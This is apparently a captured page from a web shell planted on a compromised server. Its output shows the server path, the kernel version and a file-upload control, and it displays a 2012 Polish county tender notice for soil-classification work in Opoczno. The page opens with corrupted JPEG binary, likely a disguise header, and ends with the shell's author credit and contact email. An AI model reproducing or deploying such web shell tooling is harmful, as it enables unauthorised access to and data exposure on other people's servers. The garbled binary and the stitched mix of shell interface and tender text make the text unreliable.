JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120313/58359-N-2012.html

<p class="kh_header"><b>Opoczno: Wykonywanie prac z zakresu gleboznawczej klasyfikacji gruntów na terenie powiatu opoczyńskiego w 2012 roku</b><br>
<b>Numer ogłoszenia: 58359 - 2012; data zamieszczenia: 13.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Opoczyński reprezentowany przez Zarząd Powiatu Opoczno , ul. Kwiatowa 1a, 26-300 Opoczno, woj. łódzkie, tel. 044 7361500, faks 044 7361500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opocznopowiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie prac z zakresu gleboznawczej klasyfikacji gruntów na terenie powiatu opoczyńskiego w 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Wykonywanie prac z zakresu gleboznawczej klasyfikacji gruntów na terenie powiatu opoczyńskiego w 2012 roku z podziałem na trzy zadania:
1.1  Zadanie I  
Aktualizacja użytków gruntowych i klas gleboznawczych w celu usunięcia niestandardowych kodów OFU - OZU występujących w operacie ewidencji gruntów i budynków.
Prace mają na celu dostosowanie danych w części opisowej i części graficznej operatu ewidencyjnego do stanu prawnego wynikającego z zapisów Rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa   z dnia 29 marca 2001 r. w sprawie ewidencji gruntów i budynków i Instrukcji G-5, w związku z wejściem w życie z dniem 1 stycznia 2003 r. przepisów ustaw: 
z dnia 30 października 2002 r. o zmianie ustawy o podatkach i opłatach lokalnych oraz zmianie niektórych innych ustaw ( Dz. U. Nr 200, poz. 1683 ), 
z dnia 10 października 2002 r. o zmianie ustawy o podatku rolnym ( Dz. U. Nr 200, poz. 1680 ),
z dnia 30 października 2002 r. o podatku leśnym ( Dz. U. Nr 200, poz.1682 z późn. zm. ).

Prace Zadania I  podzielone są na  części obejmujące obszar gmin:
Część	Nazwa gminy	Łączna ilość działek 
do weryfikacji i opracowania
1	Białaczów	142
2	Mniszków	15
3	Żarnów	225
4	Paradyż	205
5	Opoczno	544
6	Sławno	131
7	Poświętne	231
8	Drzewica	434
9	m. Opoczno	120
10	m. Drzewica	99
ogółem	                                                        2146

Przedstawiona w tabeli ilość działek do weryfikacji i opracowania jest ilością szacunkową i może ulec zmianie.

Załącznik Nr 1 do SIWZ -  przedstawia ilość działek w obrębach do weryfikacji i opracowania
Załącznik Nr 2 do SIWZ -  przedstawia wykaz działek do weryfikacji i opracowania (wiersze wyróżnione kolorem zawierają powtarzające się numery działek. Z zaznaczonego pola należy wybrać dany numer działki tylko jeden raz).

1.2  Zadanie II
Sukcesywne wykonywanie prac z zakresu gleboznawczej klasyfikacji gruntów na potrzeby  Wydziału Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami, Starostwa Powiatowego w Opocznie, polegające na bieżącym wykonywaniu robót zlecanych  w  formie  pisemnej  przez  ww  Wydział m.in.          w celu usuwania błędów w operacie ewidencji gruntów i budynków oraz konieczności wykonania aktualizacji klasyfikacji z urzędu.
Zamawiający przewiduje, że do końca 2012 roku zleci do wykonania ok. 30 opracowań, obejmujących ok. 30 działek pierwszych w poszczególnych obrębach w ramach pojedynczego zlecenia oraz łącznie ok. 40 działek następnych. Ilość prac do wykonania uzależniona jest od ilości napływających wniosków i  w  związku  z  tym  może  ulec  zmianie. Pojedyncze zlecenie obejmuje od jednej do kilkudziesięciu działek do opracowania w obrębie ewidencyjnym.  
Zamawiający w zleceniu określi  ilość  działek podlegających opracowaniu w danym obrębie ewidencyjnym. Wykonawca wystawi fakturę,  na  kwotę  zgodną  z  umową, na podstawie ilości działek uwidocznionej po prawej stronie  wykazu zmian gruntowych  lub w przypadku jego braku na podstawie ilości działek podlegających opracowaniu  kontroli terenowej.
 
Na dzień  21.02.2012 r. do zlecenia przewidziane są następujące działki:

Nazwa jednostki ewidencyjnej	Nazwa obrębu	Łączna
ilość
działek	Ilość działek pierwszych w obrębie	Ilość działek następnych w obrębie
Gm. Opoczno	Kliny	1	1	0
	Kraszków	1	1	0
	Ogonowice	1	1	
Gm. Poświętne	Studzianna	3	1	2
Gm. Mniszków	Stok	1	1	0
	Bukowiec	2	1	1
	Błogie Szlacheckie	1	1	0
	Potok B	4	1	3
	Świeciechów	1	1	0
	Jawor	2	1	1
Gm. Żarnów	 Malenie	1	1	0
	 Dąbie	3	1	2
	Zdyszewice	1	1	0
	Skórkowice	8	1	7
	Sielec	1	1	0
	Topolice	2	1	1
Gm. Paradyż	Solec	1	1	0
Gm. Sławno	Sławno	1	1	0
m. Opoczno	Obręb 4;7;10;14;20;21	14	1	13
m. Drzewica	-	0	0	0
Gm. Białaczów	-	0	0	0
Gm. Drzewica	-	0	0	0
ogółem		       49	         19	          30

Przedstawiona w tabeli ilość działek na dzień 21.02.2012r. do weryfikacji i opracowania może ulec zmianie.

1.3  Zadanie III
Aktualizacja klasyfikacji na obiektach planowanych do scalenia:
- Młynek gm. Żarnów, powiat opoczyński i Turowice gm. Fałków, powiat konecki ok. 42 ha łącznie;
- Brudzewice, gm. Poświętne ok. 45 ha

Załącznik Nr 3 do SIWZ -  przedstawia część graficzną obrębu Młynek i Turowice;
Załącznik Nr 4 do SIWZ -  przedstawia część graficzną obrębu Brudzewice.

Wykonawca zobowiązany jest przystąpić do realizacji wszystkich części Zadania I oraz do Zadania II  i Zadania III.

2. Szczegółowy opis zamówienia (dla wszystkich zadań: Zadania I; Zadania II; Zadania III):
1.Wszystkie prace muszą uwzględniać  dane wykazane w operacie  ewidencji gruntów i budynków. W przypadku nieścisłości pomiędzy danymi w części opisowej i graficznej, Wykonawca bada dokumenty źródłowe i eliminuje zaistniały  błąd .
2. Prace obejmują wywiad terenowy i geodezyjny pomiar zasięgów  użytków gruntowych i konturów klasyfikacyjnych. Zmianami należy uaktualnić mapy ewidencji gruntów oraz bazę mapy numerycznej. W przypadku braku zmiany zasięgu danego konturu należy w operacie technicznym umieścić klauzulę o sposobie weryfikacji  jego zasięgu.
3.  Przebieg wykonanych prac oraz wyniki analiz należy szczegółowo opisać  w sprawozdaniu technicznym.
4. Dokumentację powstałą w wyniku prac należy kompletować obrębami.
5. W przypadku istnienia mapy numerycznej dla danego obrębu ewidencyjnego, Wykonawca   pobiera bazę , wprowadza dane i rozlicza użytki i klasy, przekazując   w operacie bazę pierwotną i wtórną  - zaktualizowaną wynikami prac .Szczegóły wprowadzania danych do bazy EWMAPY do uzgodnienia z PODGiK.
6. Wykonawca zobowiązany jest do przygotowania projektów dokumentów potrzebnych do prowadzonego postępowania administracyjnego  wynikającego  z przepisów Kodeksu postępowania administracyjnego oraz Rozporządzenia Rady Ministrów w sprawie klasyfikacji gruntów z dnia 4 czerwca 1956 r. ( projekty przedkłada w formie pisemnej i na nośniku informacji ).
7. Wykonawca jest zobowiązany do zamieszczenia stosownych ogłoszeń, o których mowa w punkcie 6 i 8 na tablicach ogłoszeń właściwych Urzędów Gmin oraz na tablicach ogłoszeń u Sołtysów w poszczególnych obrębach ewidencyjnych.
8. Wykonawca jest zobowiązany do zorganizowania zebrania informacyjnego z zainteresowanymi  właścicielami opracowywanych działek oraz do wyłożenia projektu klasyfikacji zgodnie z obowiązującymi przepisami.
9. Proponowana zawartość operatu technicznego przekazywanego do PODGiK:
- kserokopia zlecenia otrzymanego od Zmawiającego ( dotyczy Zadania II)
- wypisy z rejestru gruntów
- notatka służbowa w sprawie przeklasyfikowania gruntów
- protokół proponowanych zmian klasyfikacji gruntów
- opisy glebowe
- szkice polowe
- rozliczenie konturów klas i użytków w działkach
- obliczenia
- mapa zmian
- mapa klasyfikacyjna uzupełniająca oraz wykaz zmian gruntowych
- protokół sprawdzenia klasyfikacji uzupełniającej podpisany przez inspektora kontroli ds. gleboznawczej klasyfikacji gruntów 
- płyta CD z wyjściową oraz nowo obliczoną bazą.
10. Zawartość dokumentacji służącej do wydania decyzji klasyfikacyjnej ( dla Zespołu do spraw Ewidencji Gruntów i Budynków ):
- kserokopia dotychczasowego wypisu / wypisów  z rejestru gruntów
- mapa zmian
- notatka służbowa w sprawie przeklasyfikowania gruntów
- protokół proponowanych zmian w klasyfikacji
- warunkowo protokół udatności zalesienia ( dotyczy Zadania II)
- mapa uzupełniająca po zmianach oraz wykaz zmian gruntowych
-dokumentacja postępowania administracyjnego w sprawie gleboznawczej klasyfikacji gruntów.
11.  Do każdego operatu technicznego powinny być dołączone 3 egzemplarze map ewidencyjnych uzupełniających i wykazów zmian gruntowych ( 1 komplet wpięty , 2 komplety luzem)
12.   Obowiązujące przepisy i instrukcje:
- ustawa z dnia 17 maja 1989r. Prawo Geodezyjne i Kartograficzne
- rozporządzenie Rady Ministrów z 4 czerwca 1956 r. w sprawie klasyfikacji gruntów 
- rozporządzenie Ministra Rozwoju Regionalnego i Budownictwa z dnia  29   marca  2001r.  w    sprawie  ewidencji  gruntów  i  budynków
- ustawa  z dnia 26 marca 1982r. o scalaniu i wymianie gruntów
- rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 9 listopada 2011r. w sprawie standardów technicznych wykonywania geodezyjnych pomiarów sytuacyjnych i wysokościowych oraz opracowania       i przekazania wyników pomiarów do państwowego zasobu geodezyjnego          i kartograficznego
- wytyczne techniczno-organizacyjne dotyczące prowadzenia ewidencji gruntów i budynków    Instrukcja G-5 Ewidencja gruntów i budynków wprowadzona Zarządzeniem nr 16 Głównego Geodety Kraju z dnia 13 listopada 2003r.
W przypadku zmiany obowiązujących przepisów w trakcie wykonywania zamówienia, Wykonawca po konsultacji z Zamawiającym ma się do nich dostosować..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w wysokości 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4, 71.35.15.00-8, 71.35.40.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień - nie dotyczy imiennie nadawanych uprawnień zawodowych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, 
Wykonawca przedstawi w ofercie kandydatów na następujące stanowiska:
- Geodety posiadającego uprawnienia zawodowe w dziedzinie geodezji i kartografii z zakresu 1 i 2, lub 2   - co najmniej 1 osoba oraz potencjał kadrowy zapewniający realizację wszystkich trzech zadań:
- Klasyfikatora spełniającego poniższe wymagania - co najmniej 1 osoba oraz potencjał kadrowy zapewniający realizację wszystkich trzech zadań:
- odbycie specjalistycznego kursu dla klasyfikatorów w Instytucie Uprawy Nawożenia i Gleboznawstwa Państwowego Instytutu Badawczego w Puławach lub  ukończone studium podyplomowe w zakresie klasyfikacji gruntów;
- praktyczna znajomość przeprowadzania klasyfikacji w terenie potwierdzona pisemnym oświadczeniem odbycia co najmniej rocznej praktyki przez innego klasyfikatora (w tym przez WBG) wpisanego uprzednio na listę Wojewody lub potwierdzenie wpisania uprzednio na listę Wojewody.
- Inspektora Kontroli ds. gleboznawczej klasyfikacji gruntów, spełniającego poniższe wymagania - co najmniej 1 osoba:
- dyplom uczelni rolniczej lub technicznej, a w programie nauczania gleboznawstwo;
- dwuletnia praktyka (oświadczenie podpisane przez innego klasyfikatora, w tym przez WBG potwierdzające praktykę).
Ocena spełnienia przez Wykonawców warunku udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana zgodnie z formułą spełnia  nie spełnia wymagany warunek w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Informacje zawarte we wzorze umowy - wg załącznika Nr 10 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.opocznopowiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Opocznie, ul. Kwiatowa 1a, 26-300 Opoczno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2012 godzina 12:30, miejsce: Oferty należy składać w biurze podawczym w Starostwie Powiatowym, ul. Kwiatowa 1a, 26-300 Opoczno lub za pośrednictwem poczty..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com